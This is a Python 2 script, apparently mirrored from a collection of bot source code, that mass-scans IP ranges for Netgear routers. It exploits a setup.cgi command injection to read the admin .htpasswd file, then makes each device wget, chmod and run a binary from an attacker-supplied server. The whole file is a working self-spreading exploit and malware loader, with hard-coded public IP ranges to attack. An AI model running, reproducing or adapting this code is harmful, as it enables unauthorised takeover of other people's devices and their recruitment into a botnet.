mirror of https://github.com/threatland/TL-BOTS
151 lines
5.0 KiB
Python
151 lines
5.0 KiB
Python
import threading, urllib2, random, socket, time, sys, os
|
|
|
|
ports = [5000, 80, 8080, 8888]
|
|
blacklisted = ["127.0","10.0","192.168"]
|
|
|
|
found = 0
|
|
hosts = 0
|
|
othreads = 0
|
|
|
|
if len(sys.argv) < 4:
|
|
sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <ip>")
|
|
|
|
server_ip = sys.argv[4]
|
|
|
|
print """\nStarting Scan."""
|
|
os.system("color 0a")
|
|
|
|
def ngscanner(ip):
|
|
global ports
|
|
global found
|
|
global hosts
|
|
global othreads
|
|
global passwords
|
|
try:
|
|
thisipisbad='no'
|
|
for badip in blacklisted:
|
|
if badip in ip:
|
|
thisipisbad='yes'
|
|
if thisipisbad=='yes':
|
|
sys.exit()
|
|
for port in ports:
|
|
try:
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.settimeout(3)
|
|
s.connect((ip, port))
|
|
s.close()
|
|
ppport = port
|
|
except:
|
|
pass
|
|
|
|
hosts += 1
|
|
dobreak=False
|
|
if ppport != 80:
|
|
rs = urllib2.urlopen("http://" + ip + ":" + str(ppport) + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/¤tsetting.htm=1")
|
|
else:
|
|
rs = urllib2.urlopen("http://" + ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/¤tsetting.htm=1")
|
|
if "admin:" in rs.read():
|
|
badserver=False
|
|
else:
|
|
othreads = othreads - 1
|
|
sys.exit()
|
|
badserver=False
|
|
if badserver == False:
|
|
print "Found! -> " + ip
|
|
if ppport != 80:
|
|
url = "http://" + ip + ":" + str(ppport) + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/¤tsetting.htm=1"
|
|
else:
|
|
url = "http://" + ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/¤tsetting.htm=1"
|
|
rs = urllib2.urlopen(url, timeout=5)
|
|
vuln = open("netgear.txt", "a").write(ip + "\n")
|
|
othreads = othreads - 1
|
|
except Exception as e:
|
|
#print e
|
|
othreads = othreads - 1
|
|
|
|
|
|
if sys.argv[2] == "LUCKY":
|
|
ranges = ["206.59.0.0/206.59.255.255", "94.29.100.0/94.29.255.255", "91.140.100.0/91.140.255.255", "197.89.0.0/197.89.255.255"]
|
|
randomrange = random.choice(ranges)
|
|
startrng = randomrange.split("/")[0]
|
|
endrng = randomrange.split("/")[1]
|
|
|
|
if sys.argv[2] != "LUCKY":
|
|
a = int(sys.argv[2].split(".")[0])
|
|
b = int(sys.argv[2].split(".")[1])
|
|
c = int(sys.argv[2].split(".")[2])
|
|
d = int(sys.argv[2].split(".")[3])
|
|
else:
|
|
a = int(startrng.split(".")[0])
|
|
b = int(startrng.split(".")[1])
|
|
c = int(startrng.split(".")[2])
|
|
d = int(startrng.split(".")[3])
|
|
x = 0
|
|
|
|
|
|
print "Scanning " + str(a) + "." + str(b) + "." + str(c) + ".*"
|
|
while(True):
|
|
try:
|
|
|
|
if sys.argv[2] != "LUCKY":
|
|
endaddr = sys.argv[3]
|
|
else:
|
|
endaddr = endrng
|
|
|
|
d += 1
|
|
|
|
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
|
|
|
|
if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
|
|
if sys.argv[2] == "LUCKY":
|
|
randomrange = random.choice(ranges)
|
|
startrng = randomrange.split("/")[0]
|
|
endrng = randomrange.split("/")[1]
|
|
a = int(startrng.split(".")[0])
|
|
b = int(startrng.split(".")[1])
|
|
c = int(startrng.split(".")[2])
|
|
d = int(startrng.split(".")[3])
|
|
else:
|
|
break
|
|
|
|
if d > 255:
|
|
c += 1
|
|
d = 0
|
|
print "Scanning " + str(a) + "." + str(b) + "." + str(c) + ".*"
|
|
|
|
if c > 255:
|
|
b += 1
|
|
c = 0
|
|
print "Scanning " + str(a) + "." + str(b) + "." + str(c) + ".*"
|
|
|
|
if b > 255:
|
|
a += 1
|
|
b = 0
|
|
print "Scanning " + str(a) + "." + str(b) + "." + str(c) + ".*"
|
|
|
|
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
|
|
|
|
if ipaddr == endaddr:
|
|
if sys.argv[2] == "LUCKY":
|
|
randomrange = random.choice(ranges)
|
|
startrng = randomrange.split("/")[0]
|
|
endrng = randomrange.split("/")[1]
|
|
a = int(startrng.split(".")[0])
|
|
b = int(startrng.split(".")[1])
|
|
c = int(startrng.split(".")[2])
|
|
d = int(startrng.split(".")[3])
|
|
else:
|
|
break
|
|
|
|
othreads += 1
|
|
|
|
while(othreads >= int(sys.argv[1])):
|
|
time.sleep(1)
|
|
|
|
t = threading.Thread(target=ngscanner, args=(ipaddr,))
|
|
t.start()
|
|
|
|
except Exception as e:
|
|
pass
|
|
|
|
print "\x1b[37mDone\x1b[37m" |